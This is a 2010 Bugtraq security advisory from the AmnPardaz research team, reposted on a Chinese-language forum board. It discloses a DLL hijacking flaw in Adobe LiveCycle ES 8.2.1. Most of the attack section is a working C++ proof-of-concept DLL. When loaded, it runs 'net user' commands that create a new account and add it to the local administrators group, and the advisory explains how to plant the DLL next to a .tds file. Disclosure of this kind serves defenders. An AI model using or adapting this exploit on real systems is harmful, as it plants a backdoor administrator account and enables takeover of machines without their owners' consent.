Adobe LiveCycle ES DLL Hijacking Exploit (.dll)

看板Bugtraq作者admin.時間15年前 (2010/09/14 02:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

##########################www.BugReport.ir##################################= ###### # # AmnPardaz Security Research Team # # Title:=09=09Adobe LiveCycle ES DLL Hijacking Exploit (.dll) # Vendor:=09=09http://www.adobe.com/products/livecycle/ # Vulnerable Version:=098.2.1.3144.1.471865 # Exploitation:=09=09Remote Code Execution ############################################################################= ####### #################### - Description: #################### Adobe=AE LiveCycle=AE Enterprise Suite (ES) software can help you extend =20 the value of existing back-end systems by enabling developers to build =20 and deploy applications quickly and easily, and by empowering business =20 users to manage application environments based on their specific needs. With Adobe LiveCycle ES, you can make it easier for people to interact =20 with information through intuitive user experiences, improve =20 efficiencies through business process automation, and enhance customer =20 service through personalized communications management. #################### - Vulnerability: #################### +--> DLL Hijacking =09Compile the exploit and rename to .dll, create a file in the same dir =20 with *.tds extension. =09(Vulnerability is discovered by DLLHijackAuditKit v2) #################### - Exploits/PoCs: #################### //tested on Windows XP SP3 #include "stdafx.h" #include "windows.h" #include <cstdlib> int main() { system("net user apuser appass /add"); system("net localgroup administrators apuser /add"); exit(0); return 0; } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved =09=09=09=09=09 ) { =09switch (ul_reason_for_call) =09{ =09case DLL_PROCESS_ATTACH: =09=09main(); =09case DLL_THREAD_ATTACH: =09case DLL_THREAD_DETACH: =09case DLL_PROCESS_DETACH: =09=09break; =09} =09return TRUE; } #################### - Solution: #################### http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll= -preloading-remote-attack-vector.aspx #################### - Original Advisory: #################### http://www.bugreport.ir/index_74.htm #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 admin. 的文章

文章代碼(AID): #1CZcRZbQ (Bugtraq)